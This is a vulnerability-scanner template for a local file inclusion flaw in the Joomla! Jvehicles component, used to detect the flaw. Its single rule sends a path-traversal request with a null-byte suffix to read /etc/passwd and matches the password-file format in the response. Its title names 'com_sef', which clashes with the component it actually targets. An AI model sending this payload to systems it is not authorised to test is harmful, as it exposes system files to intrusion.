id: joomla-jvehicles-lfi

info:
  name: Joomla! Component com_sef - Local File Inclusion
  author: daffainfo
  severity: high
  description: A local file inclusion vulnerability in the Jvehicles (com_jvehicles) component version 1.0 for Joomla! allows remote attackers to load arbitrary files via the controller parameter in index.php.
  reference:
    - https://www.exploit-db.com/exploits/11997

rules:
  r0:
    request:
      method: GET
      path: /index.php?option=com_jvehicles&controller=../../../../../../../../../../etc/passwd%00
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()